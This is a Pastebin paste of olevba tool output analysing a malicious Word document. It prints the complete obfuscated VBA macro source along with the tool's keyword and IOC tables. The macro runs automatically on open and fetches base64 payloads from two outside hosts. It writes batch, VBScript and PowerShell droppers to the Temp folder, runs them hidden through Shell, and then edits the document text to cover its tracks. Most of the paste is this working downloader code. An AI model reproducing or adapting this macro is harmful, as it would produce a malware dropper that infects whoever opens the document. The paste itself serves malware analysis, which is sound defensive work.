Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- automa~1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: automa~1.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: automa~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub Auto_Open()
- huefhiuwefhwefh
- End Sub
- Sub huefhiuwefhwefh()
- Dim huwe, auwd As Integer
- Dim retVal As Variant
- HUWQD = Module1.Huwd(10000)
- FL2 = "" & HUWQD
- HPPSDJ = "Temp"
- PH2 = Module1.Bad("" & HPPSDJ) + "\"
- NDUWGD = "461237618273612"
- HYWDAX = "baUhdwuqhdiqwududqwwgdjssadt"
- WKDOQ = NDUWGD
- PSFL = FL2 + "" & "." + "p" + "" + Chr(Asc("s")) _
- + _
- "1"
- VBFL = FL2 + Chr(50 - 4) + "v" + "b" & "" & "s" & ""
- huwe = 1
- BAFL = FL2 + Chr(Sgn(-22) + 11 + 10 + 25 + huwe + 0) + Left(HYWDAX, 2) + Right(HYWDAX, 1)
- INTG = "o" & "bject"
- AFTG = "module"
- SXE = "" & Chr(Asc(".")) & Chr(Asc("e")) & "xe" & ""
- GNG = ".png"
- PHT = "" & "htt" & "p://" & ""
- SPIC = PHT + "sav" & "epic.su/"
- PSPTH = PH2 + PSFL
- VBPTH = PH2 + VBFL
- BAPTH = PH2 + BAFL
- DRT = FreeFile
- BFT = FreeFile
- CFT = FreeFile
- DFT = FreeFile
- EFT = FreeFile
- PBIN = PHT + "hpg.se/tmp/1623782.txt"
- Dim obg, obg4 As Object
- Dim asdwq As String
- Set obg = CreateObject("MSXML2.ServerXMLHTTP")
- obg.Open "GET", PBIN
- obg.Send ""
- CONT = obg.ResponseText
- asdwq = CONT
- HQUWDAAA = "0"
- If (asdwq = "") Then
- PBIN = PHT + "sundsvallsrk.nu/tmp/1623782.txt"
- Set obg4 = _
- CreateObject("MSXML2.ServerXMLHTTP")
- obg4.Open "GET", PBIN
- obg4.Send ""
- CONT = obg.ResponseText
- asdwq = CONT
- HQUWDAAA = "1"
- End If
- CONT = Module1.Decode(asdwq)
- TVT10 = Module1.Tort(CONT, "text10")
- TVT20 = Module1.Tort(CONT, "text20")
- TVT21 = Module1.Tort(CONT, "text21")
- TVT30 = Module1.Tort(CONT, "text30")
- TVT31 = Module1.Tort(CONT, "text31")
- XPT1 = Module1.Tort(CONT, "stext1")
- XPT2 = Module1.Tort(CONT, "stext2")
- XPT3 = Module1.Tort(CONT, "stext3")
- WVR = Module1.Bad("USERPROFILE")
- post1 = InStr(WVR, "sers\")
- If (post1 <> 0) Then
- VRR = "1"
- Else
- VRR = "0"
- End If
- Module1.WaitFor (1)
- Dim obg2 As Object
- Set obg2 = _
- CreateObject("MSXML2.ServerXMLHTTP")
- MIWDWQ = "http://hpg.se/tmp/lns.txt"
- If (HQUWDAAA = "1") Then
- MIWDWQ = "http://sundsvallsrk.nu/tmp/lns.txt"
- End If
- obg2.Open "GET", MIWDWQ
- obg2.Send ""
- SEXX = obg2.ResponseText
- PSTB = PBIN + "123123123"
- STAR1 = SPIC + "5550684" + GNG
- STAR2 = SPIC + "5540444" + GNG
- FFQ = "8"
- FF = FFQ + SXE
- If (VRR = "0") Then
- Open BAPTH For Output As #DRT
- Print #DRT, XPT1
- Print #DRT, "set trfd=" + Chr(34) + PH2 + Chr(34)
- Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
- Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
- Print #DRT, XPT2
- Close #DRT
- Module1.WaitFor (2)
- Open VBPTH For Output As #BFT
- Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
- Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
- Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
- Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
- Print #BFT, XPT3
- Close #BFT
- Module1.WaitFor (2)
- NTH1 = Module1.Freat(retVal, BAPTH)
- End If
- If (VRR = "1") Then
- Open PSPTH For Output As #CFT
- Print #CFT, "$aisjd = '123';"
- Print #CFT, "$stat = '" + STAR2 + "';"
- Print #CFT, "$ggtt = '" + SEXX + "';"
- Print #CFT, "$pths = '" + PH2 + "';"
- Print #CFT, "$wehs = '" + FL2 + "';"
- Print #CFT, "$nnm = '" + FFQ + "';"
- Print #CFT, TVT10
- Close #CFT
- Open VBPTH For Output As #DFT
- Print #DFT, TVT30
- Print #DFT, "currentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&djwq"
- Print #DFT, TVT31
- Close #DFT
- Open BAPTH For Output As #EFT
- Print #EFT, "@echo off"
- Print #EFT, TVT20
- Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
- Print #EFT, "set Gds4=" + Chr(34) + PH2 + Chr(34) + "%Ads3%"
- Print #EFT, TVT21
- Close #EFT
- Module1.WaitFor (1)
- NTH2 = Module1.Freat(retVal, BAPTH)
- End If
- JUW = Chr(47)
- AKK = Chr(60)
- ZKK = ">"
- NTH3 = Module2.Nybdqwd(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1)
- NTH4 = Module2.Nybdqwd(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2)
- NTH5 = Module2.Nybdqwd(AKK + INTG + ZKK, "", 3)
- NTH6 = Module2.Nybdqwd(AKK + JUW + INTG + ZKK, "", 3)
- NTH7 = Module2.Nybdqwd(AKK + AFTG + ZKK, "", 3)
- NTH8 = Module2.Nybdqwd(AKK + JUW + AFTG + ZKK, "", 3)
- End Sub
- Sub AutoOpen()
- Auto_Open
- End Sub
- Sub Workbook_Open()
- Auto_Open
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- | AutoExec | Auto_Open | Runs when the Excel Workbook is opened |
- | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Output | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Print # | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | http://hpg.se/tmp/ln | URL |
- | | s.txt | |
- | IOC | http://sundsvallsrk. | URL |
- | | nu/tmp/lns.txt | |
- +------------+----------------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: automa~1.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function Huwd(a As Integer)
- Huwd = CStr(Int((a * Rnd) + 10000))
- End Function
- Sub WaitFor(NumOfSeconds As Long)
- Dim SngSec As Long
- SngSec = Timer + NumOfSeconds
- Do While Timer < SngSec
- DoEvents
- Loop
- End Sub
- Public Function Freat(a As Variant, b)
- a = _
- Shell(b, 0)
- Freat = a
- End Function
- Public Function Tort(a, b As String)
- Dim krd, lent As Integer
- krd = InStr(1, a, "<" + b + ">") + 8
- lent = InStr(1, a, "<" + "/" + b + ">") - krd
- KLMN = Mid(a, krd, lent)
- AUHWUD = KLMN
- Tort = AUHWUD
- End Function
- Public Function Dtgt(a As String)
- Quick = GetObject(a)
- End Function
- Public Function Quick(a As String)
- Quick = GetObject(a)
- End Function
- Public Function Bad(a As String)
- Bad = _
- Environ(a)
- End Function
- Public Function Decode(ByVal strData As String) As String
- Dim objXML As Object
- Dim objNode As Object
- Set objXML = CreateObject("MSXML2.DOMDocument")
- Set objNode = objXML.createElement("b64")
- objNode.DataType = "bin.base64"
- objNode.Text = strData
- WUDHA = objNode.nodeTypedValue
- Decode = WUDHA
- Set objNode = Nothing
- Set objXML = Nothing
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | Environ | May read system environment variables |
- +------------+--------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: automa~1.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function Nybdqwd(a As String, b As String, c As Integer)
- Dim selectedText As String
- Dim hhhg, selRange As Range
- Set hhhg = ActiveDocument.Range
- With hhhg.Find
- .Text = a
- .MatchWholeWord = True
- hhhg.Find.Execute
- hhhg.Collapse direction:=wdCollapseEnd
- NYQDIAYGDH = "jk h32h 4hg32j4f 23f4 hg2f3h4j32f43 21ghh21fj 3g1"
- Set selRange = ActiveDocument.Range
- QUDHDHGJDWK = "h21 kj3hkj12g3 hj12g3jh1f2 3ghf12 3jh12g3f 12hf3"
- selRange.Start = hhhg.End
- .Text = b
- .MatchWholeWord = True
- .Execute
- hhhg.Collapse direction:=wdCollapseStart
- selRange.End = hhhg.Start
- If (c = 1) Then
- selectedText = selRange.Delete
- End If
- If (c = 2) Then
- selRange.Font.Color = wdColorBlack
- End If
- If (c = 3) Then
- With hhhg.Find
- .Text = a
- .Replacement.Text = Chr(32)
- .Wrap = wdFindContinue
- .Execute Replace:=wdReplaceAll
- End With
- End If
- End With
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+---------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+---------+-----------------------------------------+
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- +------------+---------+-----------------------------------------+
Add Comment
Please, Sign In to add comment